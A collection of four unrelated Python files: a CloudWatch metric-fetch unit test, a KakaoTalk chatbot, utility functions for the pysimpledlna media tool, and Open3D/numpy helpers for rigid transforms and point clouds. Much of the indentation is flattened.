'cloudwatch.incoming_log_events.preview.search-api.nginx_logs.sum 0.0 1537113600'
]
class TestGetMetricFromCloudwatch(TestApp):
@freeze_time("2018-09-21 16:00:00")
def test_get_metric_from_cloudwatch(self):
config_metric_entry = {
'Namespace': 'DM-RequestTimeBuckets',
'MetricName': 'preview-antivirus-api-request-times-0',
'Statistics': 'Sum',
'Dimensions': {},
'Options': {
'Formatter': 'cloudwatch.request_time_buckets.preview.antivirus-api.request_time_bucket_0.%(statistic)s'
}
}
self.client.get_metric_statistics = mock.Mock()
get_metric_from_cloudwatch(self.client, config_metric_entry)
self.client.get_metric_statistics.assert_called_once_with(
Period=60,
StartTime=datetime(2018, 9, 21, 15, 50),
EndTime=datetime(2018, 9, 21, 16, 0),
MetricName='preview-antivirus-api-request-times-0',
Namespace='DM-RequestTimeBuckets',
Statistics=['Sum'],
Dimensions=[],
Unit='None',
)
|
from kakaopy.client import Client
import json
class main(Client):
async def onMessage(self, chat):
print(chat.message)
if chat.message == "power":
await chat.reply("kakaopy is runnnnnnnnning~")
if chat.message == "Hello":
attachment = {'mentions': [{'user_id': chat.authorId, 'at': [1], 'len': 2}]}
await chat.channel.sendChat("Hello~ " + "@태그",json.dumps(attachment),1)
        # If you have open chat permission
        if chat.message == ".hide":
            await chat.hide()
|
import random
import subprocess
from pathlib import Path
from xml.dom.minidom import Childless
import time
import os
import appdirs
import socket
BASE_RAND_STR = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'  # the original duplicated 'G'/'g' where 'J'/'j' belongs
BASE_RAND_STR_LEN = len(BASE_RAND_STR)
def random_str(str_len=16) -> str:
    return ''.join(random.choice(BASE_RAND_STR) for _ in range(str_len))
def is_in_nuitka() -> bool:
t = os.environ.get("nuitka", None)
return t is not None
def get_abs_path(rel_path=None) -> Path:
if is_in_nuitka():
if rel_path is not None:
return (Path(os.environ.get('nuitka_exe_dir')) / Path(rel_path)).absolute()
else:
return Path(os.environ.get('nuitka_exe_dir')).absolute()
elif rel_path is not None:
return Path(rel_path).absolute()
else:
return Path('.').absolute()
def get_element_data_by_tag_name(doc, tag_name, index=0, default=None) -> str:
element = get_element_by_tag_name(doc, tag_name, index)
child = element.firstChild
if child is None:
return default
if not hasattr(child, 'data'):
return default
return child.data
def get_element_by_tag_name(doc, tag_name, index=0, default=Childless()):
elements = doc.getElementsByTagName(tag_name)
if len(elements) == 0:
return default
return elements[index]
def wait_interval(interval, start, end):
dur = end - start
rest = interval - dur
if rest >= 0:
time.sleep(rest)
return rest
def to_seconds(t: str) -> int:
    a = t.split(':')
    try:
        return int(a[0]) * 60 * 60 + int(a[1]) * 60 + int(a[2])
    except (IndexError, ValueError):  # malformed time string
        return 0
def format_time(seconds) -> str:
m, s = divmod(seconds, 60)
h, m = divmod(m, 60)
return "%02d:%02d:%02d" % (h, m, s)
def get_user_data_dir():
user_dir = appdirs.user_data_dir('pysimpledlna', 'wx_c')
if not os.path.exists(user_dir):
os.makedirs(user_dir)
return os.path.abspath(user_dir)
def get_playlist_dir(base, playlist):
full_path = os.path.join(base, playlist)
if not os.path.exists(full_path):
os.makedirs(full_path)
return os.path.abspath(full_path)
def get_log_file_path():
return str((Path(get_user_data_dir()) / Path('./logs/log.txt')).absolute())
def get_log_file_dir():
return os.path.join(get_user_data_dir(), 'logs')
def get_desktop_dir():
import winreg
key = winreg.OpenKey(
winreg.HKEY_CURRENT_USER,
r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
)
desktop, _ = winreg.QueryValueEx(key, 'Desktop')
return desktop
def get_setting_file_path():
user_dir = get_user_data_dir()
return os.path.join(user_dir, 'settings.json')
def get_history_file_path():
user_dir = get_user_data_dir()
return os.path.join(user_dir, 'history.txt')
def get_free_tcp_port():
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind(('', 0))
addr, port = tcp.getsockname()
tcp.close()
return port
def is_tcp_port_occupied(ip_address: str, port: int):
tcp = None
try:
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp.bind((ip_address, port))
tcp.close()
return False
except:
return True
finally:
try:
if tcp is not None:
tcp.close()
except:
pass
def start_subprocess(command, cwd='.'):
return subprocess.Popen(command, cwd=cwd, shell=True, creationflags=subprocess.DETACHED_PROCESS)
def is_in_prompt_mode(args):
return hasattr(args, 'prompt_mode')
|
#!/usr/bin/env python
import os
import numpy as np
import open3d as o3
import transforms3d as t3
import pyquaternion as pq
def invert_ht(ht):
ht = np.tile(ht, [1, 1, 1])
iht = np.tile(np.identity(4), [ht.shape[0], 1, 1])
iht[..., :3, :3] = ht[..., :3, :3].transpose(0, 2, 1)
iht[..., :3, [3]] = -np.matmul(iht[..., :3, :3], ht[..., :3, [3]])
return iht.squeeze()
def create_wire_box(edgelengths, color=[0.0, 0.0, 0.0]):
lineset = o3.LineSet()
x, y, z = edgelengths
lineset.points = o3.Vector3dVector([[0, 0, 0], [x, 0, 0], [0, y, 0],
[x, y, 0], [0, 0, z], [x, 0, z], [0, y, z], [x, y, z]])
lineset.lines = o3.Vector2iVector([[0, 1], [1, 3], [3, 2], [2, 0],
[0, 4], [1, 5], [3, 7], [2, 6],
[4, 5], [5, 7], [7, 6], [6, 4]])
lineset.colors = o3.Vector3dVector(np.tile(color, [len(lineset.lines), 1]))
return lineset
def intensity2color(intensity):
return np.tile(np.reshape(intensity * 0.8, [-1, 1]), [1, 3])
def xyp2ht(xyp):
    ht = np.tile(np.identity(4), [xyp.size // 3, 1, 1])  # integer division: np.tile requires int reps
cp = np.cos(xyp[..., 2])
sp = np.sin(xyp[..., 2])
ht[..., :2, 3] = xyp[..., :2]
ht[..., 0, 0] = cp
ht[..., 0, 1] = -sp
ht[..., 1, 0] = sp
ht[..., 1, 1] = cp
return ht.squeeze()
def ht2xyp(ht):
ht = np.tile(ht, [1, 1, 1])
p = np.arctan2(ht[..., 1, 0], ht[..., 0, 0])
return np.hstack([ht[..., :2, 3], np.reshape(p, [-1, 1])]).squeeze()
def interpolate_ht(ht, t, tq):
amount = np.clip((tq - t[0]) / np.diff(t), 0.0, 1.0)
pos = ht[0, :3, 3] + amount * np.diff(ht[:, :3, 3], axis=0).squeeze()
q = [pq.Quaternion(matrix=m) for m in ht]
qq = pq.Quaternion.slerp(q[0], q[1], amount=amount)
return t3.affines.compose(pos, qq.rotation_matrix, np.ones(3))
def project_xy(ht):
htp = np.identity(4)
htp[:2, 0] = ht[:2, 0] / np.linalg.norm(ht[:2, 0])
htp[:2, 1] = [-htp[1, 0], htp[0, 0]]
htp[:2, 3] = ht[:2, 3]
return htp
def xyzi2pc(xyz, intensities=None):
pc = o3.PointCloud()
pc.points = o3.Vector3dVector(xyz)
if intensities is not None:
pc.colors = o3.Vector3dVector(intensity2color(intensities / 255.0))
return pc
def average_angles(angles, weights=None):
if weights is None:
weights = np.ones(angles.shape[0])
x = np.cos(angles) * weights
y = np.sin(angles) * weights
return np.arctan2(np.sum(y), np.sum(x))
def makedirs(dir):
    try:
        os.makedirs(dir)
    except OSError:  # directory may already exist
        pass
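# A quick sanity-check sketch (uses only numpy/transforms3d from above):
# composing a rigid transform with its invert_ht inverse yields the identity.
if __name__ == '__main__':
    ht = t3.affines.compose([1.0, 2.0, 3.0], np.identity(3), np.ones(3))
    assert np.allclose(invert_ht(ht) @ ht, np.identity(4))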
|